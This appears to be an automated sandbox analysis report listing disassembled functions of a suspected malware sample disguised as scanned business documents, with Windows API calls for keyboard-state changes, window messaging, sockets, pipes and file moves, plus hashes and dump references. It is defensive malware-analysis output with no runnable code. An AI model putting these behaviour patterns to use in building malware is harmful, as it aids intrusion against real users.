                                                      • Instruction ID: fcf8d91e1d2ac9afd5216e5b544fe0bc1147dadfe26111156968dc9ab74f5ae4
                                                      • Opcode Fuzzy Hash: c7cd36431cfd85cbc9cefe7f910705308bb2fd0cab03890fa16269014a3cde8f
                                                      • Instruction Fuzzy Hash: 62912571D5021AAFCF11CFA9CC84AEEBBB8FF49320F148059E515B7251D378A991CB60
                                                      Function 00303947 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 240COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • VariantInit.OLEAUT32(?), ref: 0030396B
                                                      • CharUpperBuffW.USER32(?,?), ref: 00303A7A
                                                      • _wcslen.LIBCMT ref: 00303A8A
                                                      • VariantClear.OLEAUT32(?), ref: 00303C1F
                                                        • Part of subcall function 002F0CDF: VariantInit.OLEAUT32(00000000), ref: 002F0D1F
                                                        • Part of subcall function 002F0CDF: VariantCopy.OLEAUT32(?,?), ref: 002F0D28
                                                        • Part of subcall function 002F0CDF: VariantClear.OLEAUT32(?), ref: 002F0D34
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                                      • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                      • API String ID: 4137639002-1221869570
                                                      • Opcode ID: 92fd671974ab2dd8d94db1ba6f1860e2514f23027d83f274e4575b6ac64be60d
                                                      • Instruction ID: 6fa9274c4742c369e36445f9fcdf4ce2b120a70f234c794e3432760fb2a76d96
                                                      • Opcode Fuzzy Hash: 92fd671974ab2dd8d94db1ba6f1860e2514f23027d83f274e4575b6ac64be60d
                                                      • Instruction Fuzzy Hash: 6D9148756193059FC705EF24C49096AB7E8BF89314F14882DF8899B391DB30EE45CF92
                                                      Function 00304BAD Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 236COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 002E000E: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,002DFF41,80070057,?,?,?,002E035E), ref: 002E002B
                                                        • Part of subcall function 002E000E: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,002DFF41,80070057,?,?), ref: 002E0046
                                                        • Part of subcall function 002E000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,002DFF41,80070057,?,?), ref: 002E0054
                                                        • Part of subcall function 002E000E: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,002DFF41,80070057,?), ref: 002E0064
                                                      • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00304C51
                                                      • _wcslen.LIBCMT ref: 00304D59
                                                      • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00304DCF
                                                      • CoTaskMemFree.OLE32(?), ref: 00304DDA
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                                                      • String ID: NULL Pointer assignment
                                                      • API String ID: 614568839-2785691316
                                                      • Opcode ID: ac2940a69384330d31743b29d887bf2b973fe680288f4941637ba9f9e77a186e
                                                      • Instruction ID: 04879c94a9964625a9c3c2e42aa5b9869a3487e9339566ed5cc4abc595dc8b36
                                                      • Opcode Fuzzy Hash: ac2940a69384330d31743b29d887bf2b973fe680288f4941637ba9f9e77a186e
                                                      • Instruction Fuzzy Hash: 8E9129B1D0121DAFDF15EFA4D891AEEB7B8BF08300F10816AE515B7291EB309A54CF60
                                                      Function 003120FD Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetMenu.USER32(?), ref: 00312183
                                                      • GetMenuItemCount.USER32(00000000), ref: 003121B5
                                                      • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 003121DD
                                                      • _wcslen.LIBCMT ref: 00312213
                                                      • GetMenuItemID.USER32(?,?), ref: 0031224D
                                                      • GetSubMenu.USER32(?,?), ref: 0031225B
                                                        • Part of subcall function 002E3A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 002E3A57
                                                        • Part of subcall function 002E3A3D: GetCurrentThreadId.KERNEL32 ref: 002E3A5E
                                                        • Part of subcall function 002E3A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,002E25B3), ref: 002E3A65
                                                      • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 003122E3
                                                        • Part of subcall function 002EE97B: Sleep.KERNEL32 ref: 002EE9F3
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                                      • String ID:
                                                      • API String ID: 4196846111-0
                                                      • Opcode ID: 564acde6d93bf00fe5ca7f98b1a79633f55263c19ea19ece8c8b957c8e7e9bf9
                                                      • Instruction ID: 44a885d5e7757c65cf5b301c7b301bf767c83a588d7ca1e6e9ff3b161bfe03cf
                                                      • Opcode Fuzzy Hash: 564acde6d93bf00fe5ca7f98b1a79633f55263c19ea19ece8c8b957c8e7e9bf9
                                                      • Instruction Fuzzy Hash: 6C719D35A00205AFCB16EF65C841AEEB7F5AF4C310F158869E816EB351DB34E9928F90
                                                      Function 002EAEBA Relevance: 10.7, APIs: 7, Instructions: 162windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetParent.USER32(?), ref: 002EAEF9
                                                      • GetKeyboardState.USER32(?), ref: 002EAF0E
                                                      • SetKeyboardState.USER32(?), ref: 002EAF6F
                                                      • PostMessageW.USER32(?,00000101,00000010,?), ref: 002EAF9D
                                                      • PostMessageW.USER32(?,00000101,00000011,?), ref: 002EAFBC
                                                      • PostMessageW.USER32(?,00000101,00000012,?), ref: 002EAFFD
                                                      • PostMessageW.USER32(?,00000101,0000005B,?), ref: 002EB020
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: MessagePost$KeyboardState$Parent
                                                      • String ID:
                                                      • API String ID: 87235514-0
                                                      • Opcode ID: 216dae3cf50b44f6b063852dc644a6e74fa6b8be36f1ca0a4a710650df22e531
                                                      • Instruction ID: 76cd61465a35e926fa9b7736b59338b4e6a18a65873913cde2d070bb46bdfdf1
                                                      • Opcode Fuzzy Hash: 216dae3cf50b44f6b063852dc644a6e74fa6b8be36f1ca0a4a710650df22e531
                                                      • Instruction Fuzzy Hash: B651E2A0AA43D23DFB374736C845BBBBEA95B06304F488489E1D9458C2C3D9BCE4D751
                                                      Function 002EACDA Relevance: 10.7, APIs: 7, Instructions: 161windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetParent.USER32(00000000), ref: 002EAD19
                                                      • GetKeyboardState.USER32(?), ref: 002EAD2E
                                                      • SetKeyboardState.USER32(?), ref: 002EAD8F
                                                      • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 002EADBB
                                                      • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 002EADD8
                                                      • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 002EAE17
                                                      • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 002EAE38
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: MessagePost$KeyboardState$Parent
                                                      • String ID:
                                                      • API String ID: 87235514-0
                                                      • Opcode ID: 60c183d821f407ed560d96b03a76648cc376b64c68bc3a5369bbee4c1f22fcac
                                                      • Instruction ID: 57db2a62cb278808f24cf06fac3db3cdd84982c88752a1d081e346cd9001e59f
                                                      • Opcode Fuzzy Hash: 60c183d821f407ed560d96b03a76648cc376b64c68bc3a5369bbee4c1f22fcac
                                                      • Instruction Fuzzy Hash: 7A5129A09A47D23DFB3347358C95BBA7E995F46300F4C8498E1D9468C2C394FCA8D752
                                                      Function 002B542E Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • GetConsoleCP.KERNEL32(002C3CD6,?,?,?,?,?,?,?,?,002B5BA3,?,?,002C3CD6,?,?), ref: 002B5470
                                                      • __fassign.LIBCMT ref: 002B54EB
                                                      • __fassign.LIBCMT ref: 002B5506
                                                      • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,002C3CD6,00000005,00000000,00000000), ref: 002B552C
                                                      • WriteFile.KERNEL32(?,002C3CD6,00000000,002B5BA3,00000000,?,?,?,?,?,?,?,?,?,002B5BA3,?), ref: 002B554B
                                                      • WriteFile.KERNEL32(?,?,00000001,002B5BA3,00000000,?,?,?,?,?,?,?,?,?,002B5BA3,?), ref: 002B5584
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                      • String ID:
                                                      • API String ID: 1324828854-0
                                                      • Opcode ID: 6b7169f2015fc05dda0d95c4bbff71e0664614ab553f035911a3ce3b72a49ab9
                                                      • Instruction ID: fe68977e3f641e34a57be2e942ea9686a61197952e5a2f340992f25f7ba63017
                                                      • Opcode Fuzzy Hash: 6b7169f2015fc05dda0d95c4bbff71e0664614ab553f035911a3ce3b72a49ab9
                                                      • Instruction Fuzzy Hash: A351E370A10649AFDB21CFA8D881BEEBBF9EF09301F14411AF555EB291D730DA61CB60
                                                      Function 003010B8 Relevance: 10.6, APIs: 7, Instructions: 110networkCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 0030304E: inet_addr.WSOCK32(?), ref: 0030307A
                                                        • Part of subcall function 0030304E: _wcslen.LIBCMT ref: 0030309B
                                                      • socket.WSOCK32(00000002,00000001,00000006), ref: 00301112
                                                      • WSAGetLastError.WSOCK32 ref: 00301121
                                                      • WSAGetLastError.WSOCK32 ref: 003011C9
                                                      • closesocket.WSOCK32(00000000), ref: 003011F9
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
                                                      • String ID:
                                                      • API String ID: 2675159561-0
                                                      • Opcode ID: 1266db032cbdb2ea4d537c8f074eed681d97fee75a3fb8eb633967c656c9a6ec
                                                      • Instruction ID: 862fae86164bb2c197c74a7e8c3a3cbc7dd7caf8629054f07285c289fa748f32
                                                      • Opcode Fuzzy Hash: 1266db032cbdb2ea4d537c8f074eed681d97fee75a3fb8eb633967c656c9a6ec
                                                      • Instruction Fuzzy Hash: 80412535201204AFDB1A9F14C895BAABBE9FF49324F148059FD059B2D1C770ED41CBE0
                                                      Function 002ECF00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108filestringCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 002EDDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,002ECF22,?), ref: 002EDDFD
                                                        • Part of subcall function 002EDDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,002ECF22,?), ref: 002EDE16
                                                      • lstrcmpiW.KERNEL32(?,?), ref: 002ECF45
                                                      • MoveFileW.KERNEL32(?,?), ref: 002ECF7F
                                                      • _wcslen.LIBCMT ref: 002ED005
                                                      • _wcslen.LIBCMT ref: 002ED01B
                                                      • SHFileOperationW.SHELL32(?), ref: 002ED061
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                                                      • String ID: \*.*
                                                      • API String ID: 3164238972-1173974218
                                                      • Opcode ID: 3442d18549cb7017a3fe613eabaf26191857246bcfc1662557c5ec2a6eddd671
                                                      • Instruction ID: fecbbc416c90b0525303f2688b1b1962c528f147d4ec4402b82db41484584262
                                                      • Opcode Fuzzy Hash: 3442d18549cb7017a3fe613eabaf26191857246bcfc1662557c5ec2a6eddd671
                                                      • Instruction Fuzzy Hash: CA4176718952595FDF12EFA5C981ADEB7B8AF08380F5000E6E505EB142EE34AA95CF50
                                                      Function 00312DFD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00312E1C
                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00312E4F
                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00312E84
                                                      • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00312EB6
                                                      • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00312EE0
                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00312EF1
                                                      • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00312F0B
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: LongWindow$MessageSend
                                                      • String ID:
                                                      • API String ID: 2178440468-0
                                                      • Opcode ID: cbb485db24f260205f8bb258080aca9be8d9523124972724a864c506fedc8579
                                                      • Instruction ID: 077be94a662777278756397c7b89d6f4e1da7bc9cea39d52b68b34bfec132e2e
                                                      • Opcode Fuzzy Hash: cbb485db24f260205f8bb258080aca9be8d9523124972724a864c506fedc8579
                                                      • Instruction Fuzzy Hash: 1C311330644250AFDB26CF18DC84FA677E9EB8E711F1A5164F9108F2B1CB71ACA0DB60
                                                      Function 002E7726 Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 002E7769
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 002E778F
                                                      • SysAllocString.OLEAUT32(00000000), ref: 002E7792
                                                      • SysAllocString.OLEAUT32(?), ref: 002E77B0
                                                      • SysFreeString.OLEAUT32(?), ref: 002E77B9
                                                      • StringFromGUID2.OLE32(?,?,00000028), ref: 002E77DE
                                                      • SysAllocString.OLEAUT32(?), ref: 002E77EC
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                      • String ID:
                                                      • API String ID: 3761583154-0
                                                      • Opcode ID: c9c3b625e8a0607d6291eca940803866614a14101991e07281e7b14e5716abeb
                                                      • Instruction ID: 42d92b2e9f45a555baebabe2cc67d1753897782f75afaef13c20247a9f6b8bf3
                                                      • Opcode Fuzzy Hash: c9c3b625e8a0607d6291eca940803866614a14101991e07281e7b14e5716abeb
                                                      • Instruction Fuzzy Hash: D921B676668219AFDF11DFAACC88CFBB7ACEB09764B448025F915DB150D670DC418B60
                                                      Function 002E77FD Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 002E7842
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 002E7868
                                                      • SysAllocString.OLEAUT32(00000000), ref: 002E786B
                                                      • SysAllocString.OLEAUT32 ref: 002E788C
                                                      • SysFreeString.OLEAUT32 ref: 002E7895
                                                      • StringFromGUID2.OLE32(?,?,00000028), ref: 002E78AF
                                                      • SysAllocString.OLEAUT32(?), ref: 002E78BD
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                      • String ID:
                                                      • API String ID: 3761583154-0
                                                      • Opcode ID: 49910b6929485f94d9b4dc2e48c539790ebbf7bc8f76543a0763faba924346b7
                                                      • Instruction ID: 48581ba02efcaaef387648e4636a527381515de66ecbb73dad3f48f0cbd7a173
                                                      • Opcode Fuzzy Hash: 49910b6929485f94d9b4dc2e48c539790ebbf7bc8f76543a0763faba924346b7
                                                      • Instruction Fuzzy Hash: 8521C131668215AFDF11DFA9CC8CDEA77ECEB18360B508025F914CB2A0DA70DC41DB64
                                                      Function 002F04D2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetStdHandle.KERNEL32(0000000C), ref: 002F04F2
                                                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 002F052E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: CreateHandlePipe
                                                      • String ID: nul
                                                      • API String ID: 1424370930-2873401336
                                                      • Opcode ID: 1dbc5ef5de9bfb74bdb7355cdcd2427c01b0d2f6f595f12b2b55d439538b4f00
                                                      • Instruction ID: e22bf3efd8551523a37b4789d7b69c5f7f7297ef471b7542a530cbe3bfdc09f6
                                                      • Opcode Fuzzy Hash: 1dbc5ef5de9bfb74bdb7355cdcd2427c01b0d2f6f595f12b2b55d439538b4f00
                                                      • Instruction Fuzzy Hash: 6E21857591030A9BDF204F29DC84AA9B7A4BF447A4F604A29F9A1D71D1D7B0D960CF20
                                                      Function 002F05A7 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetStdHandle.KERNEL32(000000F6), ref: 002F05C6
                                                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 002F0601
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: CreateHandlePipe
                                                      • String ID: nul
                                                      • API String ID: 1424370930-2873401336
                                                      • Opcode ID: 1093abbc15616d57253a9ca0e526feb4cc1c06bd11b1ed8c00744be6d09aa60b
                                                      • Instruction ID: f81145e15bd277309b43202e30a51cca59a070afa582e1e8e1ff95a683567aa3
                                                      • Opcode Fuzzy Hash: 1093abbc15616d57253a9ca0e526feb4cc1c06bd11b1ed8c00744be6d09aa60b
                                                      • Instruction Fuzzy Hash: 5A21A87551031E9BDB204F68CC84AAAB7ECBF85760F204A29F9A1D72D1D7B09870CB10
                                                      Function 003140AD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 0028600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0028604C
                                                        • Part of subcall function 0028600E: GetStockObject.GDI32(00000011), ref: 00286060
                                                        • Part of subcall function 0028600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 0028606A
                                                      • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00314112
                                                      • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0031411F
                                                      • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0031412A
                                                      • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00314139
                                                      • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00314145
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
